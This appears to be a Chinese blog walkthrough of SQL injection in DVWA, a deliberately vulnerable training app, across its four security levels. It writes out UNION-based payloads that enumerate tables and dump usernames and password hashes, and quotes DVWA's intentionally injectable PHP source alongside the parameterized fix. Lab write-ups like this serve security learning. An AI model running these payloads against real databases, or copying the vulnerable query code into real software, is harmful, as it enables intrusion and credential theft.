DVWA系列---基于报错的SQL注入（SQL Injection）

刺骨的言语ヽ痛彻心扉 2023-07-03 08:23 19阅读 0赞

### 文章目录 ###

*   *  1、Low
     *  2、Medium
     *  3、High
     *  4、Impossible

**链接：** [SQL注入（SQL Injection）总结][SQL_SQL Injection]

## 1、Low ##

输入id为1  
![在这里插入图片描述][20200205125208385.png]  
尝试通过 1’ 和 1’ and 1=1 以及 1’ and ‘1’ = '1 判断注入类型是字符型还是整型。

输入 1’ and 1=1 报错，输入1’ and ‘1’='1 查询成功  
![在这里插入图片描述][20200205125403975.png]  
使用order by 查询字段数

1' order by 2 #

order by 3 报错：`Unknown column '3' in 'order clause'`，因此使用联合查询时，只需要查询两个字段。  
![在这里插入图片描述][20200205130028128.png]  
插入以下联合查询代码，查询当前数据库的表名

1' union select 1,table_name from information_schema.tables where table_schema=database() --

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70]  
继续查询当前数据库中每张表的字段信息，在此以users表为例

1' union select 1,column_name from information_schema.columns where table_schema=database() and table_name="users" --

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 1]  
继续查询users表的数据内容

1' union select 1,concat_ws(",", first_name, last_name, user, password) from users --

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 2]  
现在看一下数据库  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 3]  
**查看源码：**

<?php
 
 if( isset( $_REQUEST[ 'Submit' ] ) ) { 
 // Get input
 $id = $_REQUEST[ 'id' ];
 
 // Check database
 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
 
 // Get results
 while( $row = mysqli_fetch_assoc( $result ) ) { 
 // Get values
 $first = $row["first_name"];
 $last = $row["last_name"];
 
 // Feedback for end user
 echo "<pre>ID: { $id} First name: { $first} Surname: { $last}</pre>";
 }
 
 mysqli_close($GLOBALS["___mysqli_ston"]);
 }
 
 ?>

可见Low级别无任何过滤。

## 2、Medium ##

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 4]  
不是GET型，也不能填入ID，因此只能通过抓包来进行POST注入  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 5]  
更改id的值为2，页面正常。输入：`id='1' #&Submit=Submit`，出现以下报错  
![在这里插入图片描述][2020020517541281.png]  
换成双引号也是如此。因此判断源码中对引号进行了转义，所以在之后的渗透中，引号将不能再使用。

使用Low中的查询语句进行测试，order by 3报错，与Low相同。  
![在这里插入图片描述][20200205175944642.jpg]  
继续使用联合查询，查询数据库名称  
![在这里插入图片描述][20200205180122391.png]  
和Low级别相同，继续查询表名：

1 union select 1,table_name from information_schema.tables where table_schema=database()#

![在这里插入图片描述][20200205200338989.png]  
不再演示查询字段，直接查询内容：

1 union select 1,concat( first_name, last_name, user, password) from users#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 6]  
查询结果与Low级别相同。

**查看源码：**

<?php
 
 if( isset( $_POST[ 'Submit' ] ) ) { 
 // Get input
 $id = $_POST[ 'id' ];
 
 $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
 
 $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
 
 // Get results
 while( $row = mysqli_fetch_assoc( $result ) ) { 
 // Display values
 $first = $row["first_name"];
 $last = $row["last_name"];
 
 // Feedback for end user
 echo "<pre>ID: { $id} First name: { $first} Surname: { $last}</pre>";
 }
 
 }
 
 // This is used later on in the index.php page
 // Setting it here so we can close the database connection in here like in the rest of the source scripts
 $query = "SELECT COUNT(*) FROM users;";
 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
 $number_of_rows = mysqli_fetch_row( $result )[0];
 
 mysqli_close($GLOBALS["___mysqli_ston"]);
 ?>

其中，`mysqli_real_escape_string()` 函数转义在 SQL 语句中使用的字符串中的特殊字符，与此前分析的转译单引号、双引号相吻合。

## 3、High ##

打开是一个提交页面，一个显示页面，尝试在提交页面检测是否存在注入，发现成功，而且未进行转义。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 7]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 8]  
具体方法与Low级别相同，不再继续演示。

**查看源码：**

<?php
 
 if( isset( $_SESSION [ 'id' ] ) ) { 
 // Get input
 $id = $_SESSION[ 'id' ];
 
 // Check database
 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
 
 // Get results
 while( $row = mysqli_fetch_assoc( $result ) ) { 
 // Get values
 $first = $row["first_name"];
 $last = $row["last_name"];
 
 // Feedback for end user
 echo "<pre>ID: { $id} First name: { $first} Surname: { $last}</pre>";
 }
 
 ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); 
 }
 
 ?>

无任何验证过滤，不知道为何称之为High级别。

## 4、Impossible ##

<?php
 
 if( isset( $_GET[ 'Submit' ] ) ) { 
 // Check Anti-CSRF token
 checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
 
 // Get input
 $id = $_GET[ 'id' ];
 
 // Was a number entered?
 if(is_numeric( $id )) { 
 // Check the database
 $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
 $data->bindParam( ':id', $id, PDO::PARAM_INT );
 $data->execute();
 $row = $data->fetch();
 
 // Make sure only 1 result is returned
 if( $data->rowCount() == 1 ) { 
 // Get values
 $first = $row[ 'first_name' ];
 $last = $row[ 'last_name' ];
 
 // Feedback for end user
 echo "<pre>ID: { $id} First name: { $first} Surname: { $last}</pre>";
 }
 }
 }
 
 // Generate Anti-CSRF token
 generateSessionToken();
 
 ?>

计入了Token，使用了参数查询，定义了查询语句，基本上是不可能了。

[SQL_SQL Injection]: https://blog.csdn.net/qq_43968080/article/details/104147180
[20200205125208385.png]: https://img-blog.csdnimg.cn/20200205125208385.png
[20200205125403975.png]: https://img-blog.csdnimg.cn/20200205125403975.png
[20200205130028128.png]: https://img-blog.csdnimg.cn/20200205130028128.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70]: https://img-blog.csdnimg.cn/20200205101601239.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 1]: https://img-blog.csdnimg.cn/20200205102252434.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 2]: https://img-blog.csdnimg.cn/20200205124809211.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 3]: https://img-blog.csdnimg.cn/2020020512511744.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 4]: https://img-blog.csdnimg.cn/20200205130436975.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 5]: https://img-blog.csdnimg.cn/20200205130700850.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw,size_16,color_FFFFFF,t_70
[2020020517541281.png]: https://img-blog.csdnimg.cn/2020020517541281.png
[20200205175944642.jpg]: https://img-blog.csdnimg.cn/20200205175944642.jpg
[20200205180122391.png]: https://img-blog.csdnimg.cn/20200205180122391.png
[20200205200338989.png]: https://img-blog.csdnimg.cn/20200205200338989.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 6]: https://img-blog.csdnimg.cn/20200205200617920.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 7]: https://img-blog.csdnimg.cn/20200206114950337.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw_size_16_color_FFFFFF_t_70 8]: https://img-blog.csdnimg.cn/20200206115133657.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzOTY4MDgw,size_16,color_FFFFFF,t_70